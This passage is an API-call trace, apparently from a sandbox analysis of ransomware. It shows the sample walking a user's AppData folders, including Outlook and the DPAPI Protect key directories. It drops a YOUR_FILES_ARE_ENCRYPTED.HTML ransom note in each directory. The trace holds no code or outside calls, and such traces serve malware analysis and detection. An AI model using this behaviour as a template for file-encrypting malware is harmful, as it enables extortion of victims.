param_1=0x4ebd41e, param_2="%02X" | out: param_1="23") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="3C") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="F7") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="17") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="EF") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="7A") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="82") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="01") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="B3") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="E0") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="F4") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="AE") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="20") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="CA") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="39") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="E9") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="10") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="79") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="01") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="B2") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="45") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="5D") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="31") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="CC") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="CF") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="92") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="BA") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="46") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="32") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="83") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="3D") returned 2 [0165.399] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="16") returned 2 [0165.399] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" [0165.399] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.399] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0165.399] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x36540ce0, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x36540ce0, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x828262d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x94e, dwReserved0=0x0, dwReserved1=0x60, cFileName="Outlook.xml", cAlternateFileName="")) returned 0 [0165.399] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.399] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0165.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\outlook\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.400] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.402] CloseHandle (hObject=0x5e4) returned 1 [0165.402] GetProcessHeap () returned 0x270000 [0165.403] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.403] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x7ba80d70, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x7ba80d70, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0165.403] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect") returned 57 [0165.403] GetProcessHeap () returned 0x270000 [0165.403] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.403] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect" [0165.403] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\*" [0165.403] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x7ba80d70, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x7ba80d70, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.404] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x7ba80d70, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x7ba80d70, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.404] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf8d4cbb0, ftLastWriteTime.dwHighDateTime=0x1d7a942, nFileSizeHigh=0x0, nFileSizeLow=0x1c8, dwReserved0=0x0, dwReserved1=0x60, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0165.404] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 66 [0165.404] lstrcmpW (lpString1="CREDHIST", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.404] PathFindExtensionW (pszPath="CREDHIST") returned="" [0165.404] lstrlenW (lpString="") returned 0 [0165.404] PathFindExtensionW (pszPath="CREDHIST") returned="" [0165.404] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x7ba80d70, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0xaf255fc0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf255fc0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="S-1-5-21-3683305739-1236715609-858405165-1000", cAlternateFileName="S-1-5-~2")) returned 1 [0165.404] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000") returned 103 [0165.404] GetProcessHeap () returned 0x270000 [0165.404] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0165.406] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000" [0165.406] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000\\*" [0165.406] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x7ba80d70, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0xaf255fc0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf255fc0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.406] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x7ba80d70, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0xaf255fc0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf255fc0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.407] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xaf255fc0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaf255fc0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf255fc0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x60, cFileName="0ecb71ed-e8f1-413d-8fb0-39e71a22fd7e", cAlternateFileName="0ECB71~1")) returned 1 [0165.407] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000\\0ecb71ed-e8f1-413d-8fb0-39e71a22fd7e") returned 140 [0165.407] lstrcmpW (lpString1="0ecb71ed-e8f1-413d-8fb0-39e71a22fd7e", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.407] PathFindExtensionW (pszPath="0ecb71ed-e8f1-413d-8fb0-39e71a22fd7e") returned="" [0165.407] lstrlenW (lpString="") returned 0 [0165.407] PathFindExtensionW (pszPath="0ecb71ed-e8f1-413d-8fb0-39e71a22fd7e") returned="" [0165.407] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7bb655b0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x7bb655b0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x7bb655b0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x60, cFileName="f726565b-c258-4186-bdea-9605cc34c22b", cAlternateFileName="F72656~1")) returned 1 [0165.407] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000\\f726565b-c258-4186-bdea-9605cc34c22b") returned 140 [0165.407] lstrcmpW (lpString1="f726565b-c258-4186-bdea-9605cc34c22b", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.407] PathFindExtensionW (pszPath="f726565b-c258-4186-bdea-9605cc34c22b") returned="" [0165.407] lstrlenW (lpString="") returned 0 [0165.407] PathFindExtensionW (pszPath="f726565b-c258-4186-bdea-9605cc34c22b") returned="" [0165.407] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7bbd79d0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x7bbd79d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0xaf2c83e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x60, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0165.407] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000\\Preferred") returned 113 [0165.407] lstrcmpW (lpString1="Preferred", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.407] PathFindExtensionW (pszPath="Preferred") returned="" [0165.407] lstrlenW (lpString="") returned 0 [0165.407] PathFindExtensionW (pszPath="Preferred") returned="" [0165.407] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7bbd79d0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x7bbd79d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0xaf2c83e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x60, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 0 [0165.407] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.407] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0165.407] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3683305739-1236715609-858405165-1000\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0165.408] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0165.410] CloseHandle (hObject=0x5b8) returned 1 [0165.410] GetProcessHeap () returned 0x270000 [0165.411] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.411] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="S-1-5-21-892523515-1518344882-2423736544-500", cAlternateFileName="S-1-5-~1")) returned 1 [0165.411] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500") returned 102 [0165.411] GetProcessHeap () returned 0x270000 [0165.411] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0165.411] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500" [0165.411] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\*" [0165.411] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.416] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.416] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8276c76d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x60, cFileName="16d9487c-eb21-48f6-b767-53160cf7974d", cAlternateFileName="16D948~1")) returned 1 [0165.416] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\16d9487c-eb21-48f6-b767-53160cf7974d") returned 139 [0165.416] lstrcmpW (lpString1="16d9487c-eb21-48f6-b767-53160cf7974d", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.416] PathFindExtensionW (pszPath="16d9487c-eb21-48f6-b767-53160cf7974d") returned="" [0165.417] lstrlenW (lpString="") returned 0 [0165.418] PathFindExtensionW (pszPath="16d9487c-eb21-48f6-b767-53160cf7974d") returned="" [0165.418] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x60, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0165.418] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\Preferred") returned 112 [0165.418] lstrcmpW (lpString1="Preferred", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.418] PathFindExtensionW (pszPath="Preferred") returned="" [0165.431] lstrlenW (lpString="") returned 0 [0165.437] PathFindExtensionW (pszPath="Preferred") returned="" [0165.437] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x60, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 0 [0165.437] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.438] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 132 [0165.438] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-892523515-1518344882-2423736544-500\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0165.440] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0165.442] CloseHandle (hObject=0x5b8) returned 1 [0165.443] GetProcessHeap () returned 0x270000 [0165.444] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.448] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd3f3c550, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd3f3c550, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf8d95f90, ftLastWriteTime.dwHighDateTime=0x1d7a942, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x0, dwReserved1=0x60, cFileName="SYNCHIST", cAlternateFileName="")) returned 1 [0165.448] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 66 [0165.448] lstrcmpW (lpString1="SYNCHIST", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.448] PathFindExtensionW (pszPath="SYNCHIST") returned="" [0165.448] lstrlenW (lpString="") returned 0 [0165.448] PathFindExtensionW (pszPath="SYNCHIST") returned="" [0165.448] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd3f3c550, 